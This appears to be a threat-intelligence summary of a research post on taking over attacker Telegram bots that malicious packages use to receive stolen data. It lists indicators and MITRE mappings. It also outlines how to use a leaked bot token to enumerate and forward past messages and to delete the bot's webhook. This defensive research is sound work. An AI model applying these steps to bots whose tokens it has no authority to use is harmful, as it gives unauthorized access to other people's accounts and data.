Keypoints
- Malicious packages frequently embed Telegram bot details that attackers use to receive exfiltrated data.
- Extracted bot credentials (bot token and chat ID) can be validated via the Telegram API (getMe) to confirm the bot’s identity.
- Using the getUpdates endpoint reveals chat IDs and message IDs necessary to reference and forward messages.
- Forwarding a specific message requires the attacker’s bot token, attacker chat ID, destination chat ID, and a valid message ID; iterating message IDs can reveal historical messages.
- If the attacker configured a webhook to forward messages to a web service, investigators can either set their own webhook (only captures new messages) or delete the webhook to resume polling with getUpdates and recover past messages.
- Successfully applied, these techniques can expose large volumes of exfiltrated files and identify impacted hosts.
MITRE Techniques
- [T1071.001] Application Layer Protocol: Web Protocols – Telegram API interactions performed over HTTPS (example command pattern quoted: ‘curl “https://api.telegram.org/bot{bot-token}/getMe”’).
- [T1041] Exfiltration Over C2 Channel – Attackers used Telegram bots to receive stolen data: ‘…malicious packages that exfiltrate victims’ data to them using Telegram bots.’
- [T1078] Valid Accounts – Use of the attacker’s Telegram bot token to authenticate API requests and access bot message data: ‘the attacker’s bot token’.
- [T1102] Web Service – Attackers redirected bot messages to an external webhook endpoint hosted on a web service: ‘hxxps[:]//a7d8a278870ff9da6427af6d9dfaa3d9.m.pipedream[.]net’.
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Analysts used command-line HTTP requests (curl) to query the Telegram API and automate message retrieval/forwarding (example pattern: ‘curl …/getUpdates’).
Indicators of Compromise
- [Telegram Bot Username] referenced in malware – trakinho_bot
- [Webhook Domain] webhook destination used by attacker – a7d8a278870ff9da6427af6d9dfaa3d9.m.pipedream[.]net
- [Bot Token] attacker bot credential (redacted example) – 6414966XXXXXXXXXXXXXXXX_X
- [Chat IDs] Telegram chat identifiers observed in API responses – 6200XXXXX (attacker chat id), 6348XXXXX (researcher/my chat id)
- [Message ID] message sequence index used to locate/forward messages – 2170 (example) and other incrementing IDs
Technical procedure (condensed):
Extract the Telegram bot details (bot token and attacker chat ID) from the malicious package and verify the bot identity using the Telegram API’s getMe endpoint. Next, poll the bot with getUpdates to obtain your own chat ID and the highest message ID value; the getUpdates response shows message metadata needed to reference specific messages.
To retrieve bot-held messages, request specific messages by their message ID and forward them to a destination chat; if an attempt to forward a particular message fails, try lower message ID values until a valid one is found. To recover historical messages en masse, iterate across the range of message IDs (from 1 up to the highest known message ID) and forward each found message to the investigator’s chat so past receipts are reconstructed locally.
If the bot is configured to forward updates to an external webhook, investigators can either register their own webhook (which captures only new, future messages) or delete the attacker’s webhook to revert the bot to polling mode (allowing getUpdates to enumerate past messages). Both approaches rely on authenticated Telegram bot API calls and appropriate handling of rate limits and API responses.
Read more: https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/